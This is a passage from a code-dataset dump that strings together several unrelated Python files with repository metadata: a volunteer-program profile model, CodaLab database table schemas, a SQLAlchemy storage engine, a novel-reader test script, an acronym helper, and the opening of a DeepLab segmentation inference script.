XXXL;\n #: kept private.\n tshirt_size = db.StringProperty(\n verbose_name=ugettext('T-shirt Size'),\n choices=('XXS', 'XS', 'S', 'M', 'L', 'XL', 'XXL', 'XXXL'))\n tshirt_size.group = ugettext(\"4. Private Info\")\n tshirt_size.example_text = ugettext('See also '\n ' for women and '\n 'for men.')\n\n #: Optional field indicating gender;\n #: kept private.\n gender = db.StringProperty(\n verbose_name=ugettext('Gender'),\n choices=('male', 'female', 'other'))\n gender.group = ugettext(\"4. Private Info\")\n\n #: Property to gain insight into where students heard about this program\n program_knowledge = db.TextProperty(required=False, verbose_name=ugettext(\n \"How did you hear about this program?\"))\n program_knowledge.help_text = ugettext(\"Please be as \"\n \"specific as possible, e.g. blog post (include URL if possible), mailing \"\n \"list (please include list address), information session (please include \"\n \"location and speakers if you can), etc.\")\n program_knowledge.group = ugettext(\"4. Private Info\")\n\n #: field storing wheter the User has agreed to the site-wide Terms of Service.\n #: (Not a required field because the Terms of Service might not be present\n #: when the first User profile is created when bootstrapping the site.)\n agreed_to_tos = db.BooleanProperty(required=False, default=False,\n verbose_name=ugettext('I Agree to the Terms of Service'))\n agreed_to_tos.help_text = ugettext(\n 'Indicates whether the user agreed to this role Terms of Service.')\n agreed_to_tos.group = ugettext(\"99. Terms of Service\")\n\n #: field storing when the User has agreed to the site-wide Terms of Service.\n #: (Not a required field because the Terms of Service might not be present\n #: when the first User profile is created when bootstrapping the site.)\n agreed_to_tos_on = db.DateTimeProperty(required=False, default=None,\n verbose_name=ugettext('Has agreed to the Terms of Service on'))\n agreed_to_tos_on.help_text = ugettext(\n 'Indicates when the user agreed to this role Terms of Service.')\n agreed_to_tos.group = ugettext(\"99. Terms of Service\")\n\n #: field storing the status of this role\n #: Active means that this role can exercise all it's privileges.\n #: Invalid mean that this role cannot exercise it's privileges.\n #: Inactive means that this role cannot exercise it's data-editing\n #: privileges but should be able to see the data. For instance when a program\n #: has been marked inactive an Organization Admin should still be able to see\n #: the student applications.\n status = db.StringProperty(default='active',\n choices=['active','invalid','inactive'],\n verbose_name=ugettext('Status of this Role'))\n status.help_text = ugettext('Indicates the status of the role '\n 'concerning which privileges may be used.')\n\n #====================================================================\n #specific roles information\n #====================================================================\n\n #: List of organizations that the user with the role is a mentor for\n mentor_for = db.ListProperty(item_type=db.Key, default=[])\n mentor_for.help_text = ugettext('List of organizations for which the user '\n 'is a mentor.')\n\n #: List of organizations that the user with the role is an org admin for\n org_admin_for = db.ListProperty(item_type=db.Key, default=[])\n org_admin_for.help_text = ugettext('List of organizations for which '\n 'the user is an organization admin.')\n\n #: Points to student specific information if the user has a student role\n student_info = db.ReferenceProperty(required=False, default=None,\n reference_class=StudentInfo)\n\n def name(self):\n \"\"\"Property as 'name' for use in common templates.\n \"\"\"\n return '%s %s' % (self.given_name, self.surname)\n\n def document_name(self):\n \"\"\"Property as 'document_name' used on for example award certificates.\n \"\"\"\n if self.name_on_documents:\n return self.name_on_documents\n else:\n return self.name()\n\n def recipient_name(self):\n \"\"\"Property recipient_name that returns the name used for shipping.\n\n Does not check hasShippingAddress because this field was added later and\n would be None for old roles.\n \"\"\"\n return self.ship_name if self.ship_name else self.name()\n\n def shipping_street(self):\n \"\"\"Property shipping_street that returns shipping street if\n shipping address is set else the residential street.\n \"\"\"\n return self.ship_street if self.hasShippingAddress() else self.res_street\n\n def shipping_street_extra(self):\n \"\"\"Property shipping_street_extra that returns the 2nd shipping address line\n if shipping address is set else the residential 2nd address line.\n \"\"\"\n return self.ship_street_extra if self.hasShippingAddress() else \\\n self.res_street_extra\n\n def shipping_city(self):\n \"\"\"Property shipping_city that returns shipping city if\n shipping address is set else the residential city.\n \"\"\"\n return self.ship_city if self.hasShippingAddress() else self.res_city\n\n def shipping_state(self):\n \"\"\"Property shipping_state that returns shipping state if\n shipping address is set else the residential state.\n \"\"\"\n return self.ship_state if self.hasShippingAddress() else self.res_state\n\n def shipping_country(self):\n \"\"\"Property shipping_country that returns shipping country if\n shipping address is set else the residential country.\n \"\"\"\n return self.ship_country if self.hasShippingAddress() else self.res_country\n\n def shipping_postalcode(self):\n \"\"\"Property shipping_postalcode that returns the shipping postal code if\n shipping address set else the residential postal code.\n \"\"\"\n return self.ship_postalcode if self.hasShippingAddress() else \\\n self.res_postalcode\n\n def hasShippingAddress(self):\n \"\"\"Checks if the required fields for the shipping address are set.\n \"\"\"\n return self.ship_city and self.ship_country and self.ship_postalcode and \\\n self.ship_street\n\n def ccTld(self):\n \"\"\"Property as 'ccTld' for use in Maps.\n \"\"\"\n return countries.COUNTRIES_TO_CCTLD[self.res_country]\n\n\nclass Profile(Role):\n \"\"\"New name for Role.\n \"\"\"\n pass\n","repo_name":"SRabbelier/Melange","sub_path":"app/soc/models/role.py","file_name":"role.py","file_ext":"py","file_size_in_byte":24755,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"34554808658","text":"\"\"\"\nThe SQLAlchemy table objects for the CodaLab bundle system tables.\n\"\"\"\n# TODO: Replace String and Text columns with Unicode and UnicodeText as appropriate\n# This way, SQLAlchemy will automatically perform conversions to and from UTF-8\n# encoding, or use appropriate database engine-specific data types for Unicode\n# data. Currently, only worksheet.title uses the Unicode column type.\nfrom sqlalchemy import Column, ForeignKey, Index, MetaData, Table, UniqueConstraint\nfrom sqlalchemy.types import (\n BigInteger,\n Boolean,\n DateTime,\n Enum,\n Float,\n Integer,\n LargeBinary,\n String,\n Text,\n Unicode,\n)\nfrom sqlalchemy.sql.schema import ForeignKeyConstraint\nfrom codalab.common import StorageType\n\ndb_metadata = MetaData()\n\n# Set tables' charset to utf8, so that it is not set to latin1 by default upon creation.\n# TODO: Migrate to utf8mb4 (https://github.com/codalab/codalab-worksheets/issues/3849)\nTABLE_DEFAULT_CHARSET = 'utf8'\n\nbundle = Table(\n 'bundle',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('uuid', String(63), nullable=False),\n Column('bundle_type', String(63), nullable=False),\n # The command will be NULL except for run bundles.\n Column('command', Text, nullable=True),\n Column('state', String(63), nullable=False),\n Column('owner_id', String(255), nullable=True),\n Column('frozen', DateTime, nullable=True), # When the bundle was frozen, if it is.\n Column('is_anonymous', Boolean, nullable=False, default=False),\n Column(\n 'storage_type',\n Enum(StorageType.DISK_STORAGE.value, StorageType.AZURE_BLOB_STORAGE.value),\n nullable=True,\n ), # Where the bundle contents are stored. If set to null, nothing has been uploaded for the bundle yet.\n # When updating this column, sync it with codalab.common.StorageType.\n Column(\n 'is_dir', Boolean, nullable=True,\n ), # Whether the bundle is a directory or just a single file. If set to null, nothing has been uploaded for the bundle yet.\n UniqueConstraint('uuid', name='uix_1'),\n Index('state_index', 'state'), # Needed for the bundle manager.\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Includes things like name, description, etc.\nbundle_metadata = Table(\n 'bundle_metadata',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('bundle_uuid', String(63), ForeignKey(bundle.c.uuid), nullable=False),\n Column('metadata_key', String(63), nullable=False),\n Column('metadata_value', Text, nullable=False),\n Index('metadata_kv_index', 'metadata_key', 'metadata_value', mysql_length=63),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# For each child_uuid, we have: key = child_path, target = (parent_uuid, parent_path)\nbundle_dependency = Table(\n 'bundle_dependency',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('child_uuid', String(63), ForeignKey(bundle.c.uuid), nullable=False),\n Column('child_path', Text, nullable=False),\n # Deliberately omit ForeignKey(bundle.c.uuid), because bundles can have\n # dependencies to bundles not (yet) in the system.\n Column('parent_uuid', String(63), nullable=False),\n Column('parent_path', Text, nullable=False),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Storage location for bundles.\nbundle_store = Table(\n 'bundle_store',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('uuid', String(63), nullable=False),\n # Usually root. For BYO bundle stores (not yet supported),\n # it is the user who created the bundle store.\n Column('owner_id', String(255), nullable=True),\n # Name used to refer to this bundle store from the CLI.\n Column('name', String(255), nullable=False),\n # Storage type. This is usually redundant with information already in the url column, but set for efficiency reasons. When updating this column, sync it with codalab.common.StorageType.\n Column('storage_type', String(255), nullable=True),\n # The format through which the bundle is stored.\n Column('storage_format', String(255), nullable=True),\n # URL that uniquely identifies the bundle store.\n Column('url', String(255), nullable=True),\n # Authentication / password to access the bundle store.\n Column('authentication', String(255), nullable=True),\n # Name of environment variable through which the authentication variable from above can be passed to codalab-service to access the bundle store.\n Column('authentication_env', String(255), nullable=True),\n UniqueConstraint('uuid', name='uix_1'),\n UniqueConstraint('name', name='nix_1'),\n Index('bundle_store_name_index', 'name'),\n Index('bundle_store_owner_index', 'owner_id'),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n\n# Location where the contents of a bundle is stored. Multiple\n# BundleLocations can be associated with a single Bundle.\nbundle_location = Table(\n 'bundle_location',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n # Which bundle this location contains the contents of.\n Column('bundle_uuid', String(63), ForeignKey(bundle.c.uuid), nullable=False),\n # Which bundle store this location is on.\n Column('bundle_store_uuid', String(63), ForeignKey(bundle_store.c.uuid), nullable=False),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n\n# The worksheet table does not have many columns now, but it will eventually\n# include columns for owner, group, permissions, etc.\nworksheet = Table(\n 'worksheet',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('uuid', String(63), nullable=False),\n Column('name', String(255), nullable=False),\n Column('owner_id', String(255), nullable=True),\n Column(\n 'title', Unicode(255), nullable=True\n ), # Short human-readable description of the worksheet\n Column('frozen', DateTime, nullable=True), # When the worksheet was frozen, if it is.\n Column('is_anonymous', Boolean, nullable=False, default=False),\n Column(\n 'date_created', DateTime\n ), # When the worksheet was created; Set to null if the worksheet created before v0.5.31; Set to current timestamp by default\n Column(\n 'date_last_modified', DateTime\n ), # When the worksheet was last modified; Set to null if the worksheet created before v0.5.31; Set to current_timestamp by default\n UniqueConstraint('uuid', name='uix_1'),\n Index('worksheet_name_index', 'name'),\n Index('worksheet_owner_index', 'owner_id'),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\nworksheet_item = Table(\n 'worksheet_item',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('worksheet_uuid', String(63), ForeignKey(worksheet.c.uuid), nullable=False),\n # A worksheet item is either:\n # - type = bundle (bundle_uuid != null)\n # - type = worksheet (subworksheet_uuid != null)\n # - type = markup (value != null)\n # - type = directive (value != null)\n # Deliberately omit ForeignKey(bundle.c.uuid), because worksheets can contain\n # bundles and worksheets not (yet) in the system.\n Column('bundle_uuid', String(63), nullable=True),\n Column('subworksheet_uuid', String(63), nullable=True),\n Column('value', Text, nullable=False), # TODO: make this nullable\n Column('type', String(20), nullable=False),\n Column('sort_key', Integer, nullable=True),\n Index('worksheet_item_worksheet_uuid_index', 'worksheet_uuid'),\n Index('worksheet_item_bundle_uuid_index', 'bundle_uuid'),\n Index('worksheet_item_subworksheet_uuid_index', 'subworksheet_uuid'),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Worksheet tags\nworksheet_tag = Table(\n 'worksheet_tag',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('worksheet_uuid', String(63), ForeignKey(worksheet.c.uuid), nullable=False),\n Column('tag', String(63), nullable=False),\n Index('worksheet_tag_worksheet_uuid_index', 'worksheet_uuid'),\n Index('worksheet_tag_tag_index', 'tag'),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\ngroup = Table(\n 'group',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('uuid', String(63), nullable=False),\n Column('name', String(255), nullable=False),\n Column('user_defined', Boolean),\n Column('owner_id', String(255), nullable=True),\n UniqueConstraint('uuid', name='uix_1'),\n Index('group_name_index', 'name'),\n Index('group_owner_id_index', 'owner_id'),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\nuser_group = Table(\n 'user_group',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('group_uuid', String(63), ForeignKey(group.c.uuid), nullable=False),\n Column('user_id', String(63), ForeignKey(\"user.user_id\"), nullable=False),\n # Whether a user is able to modify this group.\n Column('is_admin', Boolean),\n Index('group_uuid_index', 'group_uuid'),\n Index('user_id_index', 'user_id'),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Permissions for bundles\ngroup_bundle_permission = Table(\n 'group_bundle_permission',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('group_uuid', String(63), ForeignKey(group.c.uuid), nullable=False),\n # Reference to a bundle\n Column('object_uuid', String(63), ForeignKey(bundle.c.uuid), nullable=False),\n # Permissions encoded as integer (see below)\n Column('permission', Integer, nullable=False),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Permissions for worksheets\ngroup_object_permission = Table(\n 'group_object_permission',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('group_uuid', String(63), ForeignKey(group.c.uuid), nullable=False),\n # Reference to a worksheet object\n Column('object_uuid', String(63), ForeignKey(worksheet.c.uuid), nullable=False),\n # Permissions encoded as integer (see below)\n Column('permission', Integer, nullable=False),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# A permission value is one of the following: none (0), read (1), or all (2).\nGROUP_OBJECT_PERMISSION_NONE = 0x00\nGROUP_OBJECT_PERMISSION_READ = 0x01\nGROUP_OBJECT_PERMISSION_ALL = 0x02\n\n# A notifications value is one of the following:\nNOTIFICATIONS_NONE = 0x00 # Receive no notifications\nNOTIFICATIONS_IMPORTANT = 0x01 # Receive only important notifications\nNOTIFICATIONS_GENERAL = 0x02 # Receive general notifications (new features)\n\n# Store information about users.\nuser = Table(\n 'user',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n # Basic information\n Column('user_id', String(63), nullable=False),\n Column('user_name', String(63), nullable=False, unique=True),\n Column(\n 'email', String(254), nullable=False, unique=True\n ), # Length of 254 to be compliant with RFC3696/5321\n Column(\n 'notifications', Integer, nullable=False, default=NOTIFICATIONS_GENERAL\n ), # Which emails user wants to receive\n Column('last_login', DateTime), # Null if user has never logged in\n Column(\n 'is_active', Boolean, nullable=False, default=True\n ), # Set to False instead of deleting users to maintain foreign key integrity\n Column('first_name', String(30, convert_unicode=True)),\n Column('last_name', String(30, convert_unicode=True)),\n Column('date_joined', DateTime, nullable=False),\n Column('has_access', Boolean, default=False, nullable=True),\n Column('is_verified', Boolean, nullable=False, default=False),\n Column('password', String(128), nullable=False),\n # Additional information\n Column('affiliation', String(255, convert_unicode=True), nullable=True),\n Column('url', String(255, convert_unicode=True), nullable=True),\n # Quotas\n Column('time_quota', Float, nullable=False), # Number of seconds allowed\n Column('parallel_run_quota', Integer, nullable=False), # Number of parallel jobs allowed\n Column('time_used', Float, nullable=False), # Number of seconds already used\n Column('disk_quota', Float, nullable=False), # Number of bytes allowed\n Column('disk_used', Float, nullable=False), # Number of bytes already used\n Column(\n 'avatar_id', String(63), nullable=True\n ), # bundle id of the user's uploaded profile picture; Null if the user has never uploaded one\n Index('user_user_id_index', 'user_id'),\n Index('user_user_name_index', 'user_name'),\n UniqueConstraint('user_id', name='uix_1'),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Stores (email) verification keys\nuser_verification = Table(\n 'user_verification',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('user_id', String(63), ForeignKey(user.c.user_id), nullable=False),\n Column('date_created', DateTime, nullable=False),\n Column('date_sent', DateTime, nullable=True),\n Column('key', String(64), nullable=False),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Stores password reset codes\nuser_reset_code = Table(\n 'user_reset_code',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('user_id', String(63), ForeignKey(user.c.user_id), nullable=False),\n Column('date_created', DateTime, nullable=False),\n Column('code', String(64), nullable=False),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# OAuth2 Tables\n\noauth2_client = Table(\n 'oauth2_client',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('client_id', String(63), nullable=False),\n Column('name', String(63), nullable=True),\n Column('secret', String(255), nullable=True),\n Column('user_id', String(63), ForeignKey(user.c.user_id), nullable=True),\n Column(\n 'grant_type',\n Enum(\"authorization_code\", \"password\", \"client_credentials\", \"refresh_token\"),\n nullable=False,\n ),\n Column('response_type', Enum(\"code\", \"token\"), nullable=False),\n Column('scopes', Text, nullable=False), # comma-separated list of allowed scopes\n Column('redirect_uris', Text, nullable=False), # comma-separated list of allowed redirect URIs\n UniqueConstraint('client_id', name='uix_1'),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\noauth2_token = Table(\n 'oauth2_token',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('client_id', String(63), ForeignKey(oauth2_client.c.client_id), nullable=False),\n Column('user_id', String(63), ForeignKey(user.c.user_id), nullable=False),\n Column('scopes', Text, nullable=False),\n Column('access_token', String(255), unique=True),\n Column('refresh_token', String(255), unique=True),\n Column('expires', DateTime, nullable=False),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\noauth2_auth_code = Table(\n 'oauth2_auth_code',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ),\n Column('client_id', String(63), ForeignKey(oauth2_client.c.client_id), nullable=False),\n Column('user_id', String(63), ForeignKey(user.c.user_id), nullable=False),\n Column('scopes', Text, nullable=False),\n Column('code', String(100), nullable=False),\n Column('expires', DateTime, nullable=False),\n Column('redirect_uri', String(255), nullable=False),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Store information about users' questions or feedback.\nchat = Table(\n 'chat',\n db_metadata,\n Column(\n 'id',\n BigInteger().with_variant(Integer, \"sqlite\"),\n primary_key=True,\n nullable=False,\n autoincrement=True,\n ), # Primary key\n Column('time', DateTime, nullable=False), # When did the user send this query?\n Column('sender_user_id', String(63), nullable=True), # Who sent it?\n Column('recipient_user_id', String(63), nullable=True), # Who received it?\n Column('message', Text, nullable=False), # What's the content of the chat?\n Column(\n 'worksheet_uuid', String(63), nullable=True\n ), # What is the id of the worksheet that the sender is on?\n Column(\n 'bundle_uuid', String(63), nullable=True\n ), # What is the id of the bundle that the sender is on?\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Store information about workers.\nworker = Table(\n 'worker',\n db_metadata,\n Column('user_id', String(63), ForeignKey(user.c.user_id), primary_key=True, nullable=False),\n Column('worker_id', String(127), primary_key=True, nullable=False),\n Column('group_uuid', String(63), ForeignKey(group.c.uuid), nullable=True),\n Column('tag', Text, nullable=True), # Tag that allows for scheduling runs on specific workers.\n Column('cpus', Integer, nullable=False), # Number of CPUs on worker.\n Column('gpus', Integer, nullable=False), # Number of GPUs on worker.\n Column('memory_bytes', BigInteger, nullable=False), # Total memory of worker.\n Column('free_disk_bytes', BigInteger, nullable=True), # Available disk space on worker.\n Column(\n 'checkin_time', DateTime, nullable=False\n ), # When the worker last checked in with the bundle service.\n Column('socket_id', Integer, nullable=False), # Socket ID worker listens for messages on.\n Column(\n 'shared_file_system', Boolean, nullable=False\n ), # Whether the worker and the server have a shared filesystem.\n Column(\n 'tag_exclusive', Boolean, nullable=False\n ), # Whether worker runs bundles if and only if they match tags.\n Column(\n 'exit_after_num_runs', Integer, nullable=False\n ), # Number of jobs allowed to run on worker.\n Column('is_terminating', Boolean, nullable=False),\n Column('preemptible', Boolean, nullable=False), # Whether worker is preemptible.\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Store information about all sockets currently allocated to each worker.\nworker_socket = Table(\n 'worker_socket',\n db_metadata,\n Column('user_id', String(63), ForeignKey(user.c.user_id), nullable=False),\n Column('worker_id', String(127), nullable=False),\n # No foreign key constraint on the worker table so that we can create a socket\n # for the worker before adding the worker to the worker table.\n Column('socket_id', Integer, primary_key=True, nullable=False),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Store information about the bundles currently running on each worker.\nworker_run = Table(\n 'worker_run',\n db_metadata,\n Column('user_id', String(63), ForeignKey(user.c.user_id), nullable=False),\n Column('worker_id', String(127), nullable=False),\n ForeignKeyConstraint(['user_id', 'worker_id'], ['worker.user_id', 'worker.worker_id']),\n Column('run_uuid', String(63), ForeignKey(bundle.c.uuid), nullable=False),\n Index('uuid_index', 'run_uuid'),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n\n# Store information about the dependencies available on each worker.\nworker_dependency = Table(\n 'worker_dependency',\n db_metadata,\n Column('user_id', String(63), ForeignKey(user.c.user_id), primary_key=True, nullable=False),\n Column('worker_id', String(127), primary_key=True, nullable=False),\n ForeignKeyConstraint(['user_id', 'worker_id'], ['worker.user_id', 'worker.worker_id']),\n # Serialized list of dependencies for the user/worker combination.\n # See WorkerModel for the serialization method.\n Column('dependencies', LargeBinary, nullable=False),\n mysql_charset=TABLE_DEFAULT_CHARSET,\n)\n","repo_name":"codalab/codalab-worksheets","sub_path":"codalab/model/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":21321,"program_lang":"python","lang":"en","doc_type":"code","stars":149,"dataset":"github-code","pt":"77"} +{"seq_id":"28040718056","text":"#!/usr/bin/python3\n\"\"\"\nDefines the DBStorage Engine for the project\n\"\"\"\nfrom os import getenv\nfrom models.base_model import Base\nfrom models.base_model import BaseModel\nfrom models.amenity import Amenity\nfrom models.city import City\nfrom models.place import Place\nfrom models.review import Review\nfrom models.state import State\nfrom models.user import User\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy.orm import scoped_session\nfrom sqlalchemy.orm import sessionmaker\n\n\nclass DBStorage:\n \"\"\"\n This Class represents the dbstorage engine\n \"\"\"\n __engine = None\n __session = None\n\n def __int__(self):\n \"\"\"\n Initializes the DBStorage instances\n \"\"\"\n db_uri = \"{0}+{1}://{2}:{3}@{4}:3306/{5}\".format(\n 'mysql', 'mysqldb', getenv('HBNB_MYSQL_USER'),\n getenv('HBNB_MYSQL_PWD'), getenv('HBNB_MYSQL_HOST'),\n getenv('HBNB_MYSQL_DB'))\n\n self.__engine = create_engine(db_uri, pool_pre_ping=True)\n self.reload()\n\n if getenv('HBNB_ENV') == 'test':\n Base.metadata.drop_all(self.__engine)\n\n def all(self, cls=None):\n \"\"\"\n Query on current db session\n Args:\n cls:\n\n Returns: Dictionary file\n\n \"\"\"\n entities = dict()\n\n if cls:\n return self.get_data_from_table(cls, entities)\n\n for entity in all_classes:\n entities = self.get_data_from_table(eval(entity), entities)\n\n return entities\n\n def new(self, obj):\n \"\"\"\n Adds the object to the current db session\n Args:\n obj:\n\n Returns:\n\n \"\"\"\n self.__session.add(obj)\n\n def save(self):\n \"\"\"\n Commit all changes to the current db session\n Returns:\n\n \"\"\"\n self.__session.commit()\n\n def delete(self, obj=None):\n \"\"\"\n Delete from the current db session\n Args:\n obj:\n\n Returns:\n\n \"\"\"\n if obj is not None:\n self.__session.delete(obj)\n\n def reload(self):\n \"\"\"\n Create all tables in the db\n Returns:\n\n \"\"\"\n Base.metadata.create_all(self.__engine)\n session_factory = sessionmaker(bind=self.__engine,\n expire_on_commit=False)\n Session = scoped_session(session_factory)\n self.__session = Session()\n\n def get_data_from_table(self, cls, structure):\n \"\"\"Get the data from a MySQL Table\n \"\"\"\n\n if type(structure) is dict:\n query = self.__session.query(cls)\n\n for _row in query.all():\n key = \"{}.{}\".format(cls.__name__, _row.id)\n structure[key] = _row\n\n return structure\n\n def close(self):\n \"\"\"\n Closes all working SQLAclhemy sessions\n Returns:\n\n \"\"\"\n self.__session.close()\n","repo_name":"ThaKookieMansta/AirBnB_clone_v2","sub_path":"models/engine/db_storage.py","file_name":"db_storage.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"71601039288","text":"from backend.service.NovelReadService import novel_read_service\nfrom backend.service.NovelDisplayService import novel_display_service\nfrom backend.controller.ReadPageController import read_page_controller\nfrom backend.controller.DisplayPageController import display_page_controller\nfrom backend.controller.InitController import init_controller\n\n\nclass DataBaseTest:\n\n def delete_all(self):\n novel_read_service.delete_chapter_basic_infos_from_db()\n novel_display_service.delete_novel_display_infos_from_db()\n novel_display_service.delete_novel_covers_from_resource()\n\n # 5部小说花费18秒\n def create_by_novel_basic_infos(self):\n l = display_page_controller.get_novel_basic_infos()\n display_page_controller.get_novel_display_infos()\n\n for o in l.values():\n read_page_controller.get_chapter_basic_infos_by_basic_object(o)\n\n def delete_all_and_create_by_novel_basic_infos(self):\n novel_read_service.delete_chapter_basic_infos_from_db()\n novel_display_service.delete_novel_display_infos_from_db()\n novel_display_service.delete_novel_covers_from_resource()\n\n l = display_page_controller.get_novel_basic_infos()\n display_page_controller.get_novel_display_infos()\n\n for o in l.values():\n read_page_controller.get_novel_all_chapters_basic_info_by_object(o)\n read_page_controller.get_chapter_basic_infos_by_basic_object(o)\n\n # 5部小说花费9秒\n def test_init(self):\n init_controller.init_all_novels_needy_data()\n\n\nif __name__ == \"__main__\":\n t = DataBaseTest()\n t.delete_all()\n","repo_name":"Charipoter/moyu-novels","sub_path":"backend/test/DataBaseTest.py","file_name":"DataBaseTest.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"35031500747","text":"def create_acronym(phrase):\n words = phrase.split() # Split the phrase into a list of words\n acronym = \"\"\n\n for word in words:\n acronym += word[0].upper() # Add the first character of each word to the acronym\n\n return acronym\n\n# Example usage\nphrase = \"James Bullough Lansing\"\nacronym = create_acronym(phrase)\nprint(acronym) # Output: PNG\n","repo_name":"nkusikevin/Py_sandbox","sub_path":"Create Acronyms/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"38825753743","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[38]:\n\n\nimport os\nfrom io import BytesIO\nimport tarfile\nimport tempfile\nfrom six.moves import urllib\n\nfrom matplotlib import gridspec\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom PIL import Image\n\nimport tensorflow as tf\n\n\nclass DeepLabModel(object):\n \"\"\"Class to load deeplab model and run inference.\"\"\"\n\n INPUT_TENSOR_NAME = 'ImageTensor:0'\n OUTPUT_TENSOR_NAME = 'SemanticPredictions:0'\n INPUT_SIZE = 700\n FROZEN_GRAPH_NAME = 'frozen_inference_graph'\n\n def __init__(self, tarball_path):\n \"\"\"Creates and loads pretrained deeplab model.\"\"\"\n self.graph = tf.Graph()\n\n graph_def = None\n # Extract frozen graph from tar archive.\n tar_file = tarfile.open(tarball_path)\n for tar_info in tar_file.getmembers():\n if self.FROZEN_GRAPH_NAME in os.path.basename(tar_info.name):\n file_handle = tar_file.extractfile(tar_info)\n graph_def = tf.GraphDef.FromString(file_handle.read())\n break\n\n tar_file.close()\n\n if graph_def is None:\n raise RuntimeError('Cannot find inference graph in tar archive.')\n\n with self.graph.as_default():\n tf.import_graph_def(graph_def, name='')\n\n self.sess = tf.Session(graph=self.graph)\n\n def run(self, image):\n \"\"\"Runs inference on a single image.\n\n Args:\n image: A PIL.Image object, raw input image.\n\n Returns:\n resized_image: RGB image resized from original input image.\n seg_map: Segmentation map of `resized_image`.\n \"\"\"\n width, height = image.size\n resize_ratio = 1.0 * self.INPUT_SIZE / max(width, height)\n target_size = (int(resize_ratio * width), int(resize_ratio * height))\n resized_image = image.convert('RGB').resize(target_size, Image.ANTIALIAS)\n batch_seg_map = self.sess.run(\n self.OUTPUT_TENSOR_NAME,\n feed_dict={self.INPUT_TENSOR_NAME: [np.asarray(resized_image)]})\n seg_map = batch_seg_map[0]\n return resized_image, seg_map\n\n\n# In[39]:\n\n\ndownload_path = 